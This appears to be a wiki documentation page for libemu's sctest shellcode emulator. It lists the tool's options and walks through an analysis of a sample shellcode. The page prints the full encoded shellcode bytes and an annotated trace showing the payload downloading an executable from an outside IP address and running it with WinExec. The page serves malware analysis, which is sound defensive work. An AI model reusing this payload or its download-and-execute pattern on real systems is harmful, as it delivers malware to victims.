Libemu/sctest
Jump to navigation
Jump to search
| You are here: | sctest
|
Description
sctest is part of the libemu testsuite and very usefull when testing new features. Even though the code is historically tainted it may be a usefull source for those who want to setup shellcode emulation allowing win32 api calls and offering hooks on these calls. sctest is not the best example, the code is nerved by the logic for graphing the callflow, but for now it has to work.
Usage
- -a PATH, --argos-csi=PATH
- use this argos csi files as input
- -b IP:PORT, --bind=IP:PORT
- bind this ip:port
- -c IP:PORT, --connect=IP:PORT
- redirect connects to this ip:port
- -C CMD, --cmd=CMD
- command to execute for "cmd" in shellcode (default: cmd="/bin/sh -c \"cd ~/.wine/drive_c/; wine 'c:\windows\system32\cmd_orig.exe' \"")
- -d INTEGER, --dump=INTEGER
- dump the shellcode (binary) to stdout
- -g, --getpc
- run getpc mode, try to detect a shellcode
- -G FILEPATH, --graph=FILEPATH
- save a dot formatted callgraph in filepath
- -h, --help
- show this help
- -i, --interactive
- proxy api calls to the host operating system
- -l, --listtests
- list all tests
- -o [INT|HEX], --offset=[INT|HEX]
- manual offset for shellcode, accepts int and hexvalues
- -p PATH, --profile=PATH
- write shellcode profile to this file
- -S, --stdin
- read shellcode/buffer from stdin, works with -g
- -s INTEGER, --steps=INTEGER
- max number of steps to run
- -t INTEGER, --testnumber=INTEGER
- the test to run
- -v, --verbose
- be verbose, can be used multiple times, f.e. -vv
Example
Let's use libemu sctest to analyze the following shellcode (lines have been wrapped):
$ more shellcode.hex \xe8\x00\x00\x00\x00\x5d\x83\xc5\x14\xb9\x8b\x01\x00\x00\xb0\x3d\x30\x45\x00\x45\x49\x75 \xf9\xeb\x00\xad\xad\xad\xad\xad\xad\xad\xad\xd4\xc1\x3d\x3d\x3d\x62\x59\x9c\x0d\x3d\x3d \x3d\x45\x31\xb6\x7d\x31\xb6\x4d\x21\x90\xb6\x55\x35\xd6\x34\xb6\x7d\x09\xb0\x7d\x41\xb6 \x55\x01\xb6\xca\x57\x39\x64\xd5\xb2\x3d\x3d\x3d\xdf\xc4\x55\x52\x53\x3d\x3d\x55\x48\x4f \x51\x50\x69\xc2\x2b\xb6\xd5\xd5\x44\x3d\x3d\x3d\xb6\xea\x7a\xbd\x02\x3d\x48\xc7\x7a\x6a \x7a\xbd\x02\x3d\x48\xc7\xb6\xd2\x62\x0e\xf4\xbc\xd1\x39\x3c\x3d\x3d\xb6\xe1\x6c\x6f\x6e \x55\x39\x3c\x3d\x3d\xc2\x6b\x31\x67\x64\x6c\x6f\xb6\x3f\x6e\x7e\xbd\x06\x3d\x48\xc7\xbc \x46\xc1\x13\x58\x45\x58\x48\x3e\xbe\xd6\x35\xb4\x3e\xfa\x7e\x39\x13\x58\x45\x58\xfb\x7e \x35\x3d\x66\xb7\xfc\x39\x0d\xb5\x78\x3d\x0e\xfd\x6d\x6d\x6e\x6a\x6d\xc2\x6b\x2d\xbe\xc5 \x3d\x48\x3b\x57\x3c\x6e\xc2\x6b\x39\x67\x64\xbe\xff\x39\x7c\xbd\x07\x3d\x48\x89\xc2\x6b \x35\x6c\x6b\xb6\x48\x01\xb6\x49\x13\x45\x3e\xc8\x6b\xb6\x4b\x1d\x3e\xc8\x0e\xf4\x74\x7c \x90\x3e\xf8\x0e\xe6\x32\x83\x2d\x07\xeb\x49\x35\xfc\xf6\x30\x3e\xe7\x7d\xd6\xcc\x06\x22 \x48\xda\x63\xb6\x63\x19\x3e\xe0\x5b\xb6\x31\x76\xb6\x63\x21\x3e\xe0\xb6\x39\xb6\x3e\xf8 \x96\x63\x64\xfe\xd5\xc2\xc3\xc2\xc2\xb3\x73\x33\xd1\xa5\xc3\xb7\x33\x43\xe5\xdf\x4e\x0e \xf7\xb7\x66\x0b\x27\x12\x4d\x4a\x77\x6c\x4e\x3d\x55\x49\x49\x4d\x07\x12\x12\x04\x09\x13 \x0f\x09\x0a\x13\x0f\x13\x0c\x08\x0a\x12\x13\x51\x5e\x56\x12\x02\x55\x00\x08\x5c\x5e\x3d \x54\x02\x05\x04\x0f\x5f\x59\x09\x0b\x58\x0d\x0c\x0d\x0d\x5b\x0d\x0a\x0d\x0d\x0f\x59\x5c \x0b\x0e\x04\x5c\x04\x5c\x0d\x0b\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0f\x5e\x0c\x08\x0d \x0e\x0c\x04\x0e\x0d\x0d\x0d\x0c\x0d\x09\x0d\x04\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0c\x0a \x0d\x3d
We will use following alias to convert this shellcode to raw binary:
$ grep hex2raw ~/.bash_aliases alias hex2raw="tr -d '\\\x' | xxd -r -p" $ cat shellcode.hex | hex2raw > shellcode.raw
Now, let's use sctest:
$ cat shellcode.raw | sctest -Svs 10000000 > sctest-out.txt
Here is the output:
| Code excerpt | Explanation |
|---|---|
$ more sctest-out.txt verbose = 1 Hook me Captain Cook! userhooks.c:108 user_hook_ExitProcess ExitProcess(1952201315) stepcount 295460 |
|
HMODULE LoadLibraryA (
LPCTSTR lpFileName = 0x00416fc6 =>
= "urlmon";
) = 0x7df20000;
|
Call LoadLibrary to load urlmon.dll, required later to invoke URLDownloadToFile |
DWORD GetTempPathA (
DWORD nBufferLength = 260;
LPTSTR lpBuffer = 0x00416ec2 =>
= "c:\tmp\";
) = 7;
|
Call GetTempPathA to determine the path where the downloaded file will be saved |
HRESULT URLDownloadToFile (
LPUNKNOWN pCaller = 0x00000000 =>
none;
LPCTSTR szURL = 0x00417140 =>
= "http://94.247.2.157/.lck/?h=5ac0i?892bd46e0100f07002da
639a9a060000000002c15031930001040900000000170";
LPCTSTR szFileName = 0x00416ec2 =>
= "c:\tmp\wJQs.exe";
DWORD dwReserved = 0;
LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
|
Call URLDownloadToFile to download and save a file from the remote URL |
UINT WINAPI WinExec (
LPCSTR lpCmdLine = 0x00416ec2 =>
= "c:\tmp\wJQs.exe";
UINT uCmdShow = 1;
) = 32;
|
Call WinExec to execute the downlaoded file |
void ExitProcess (
UINT uExitCode = 1952201315;
) = 0;
|
Call ExitProcess to exit the process that has downloaded the file |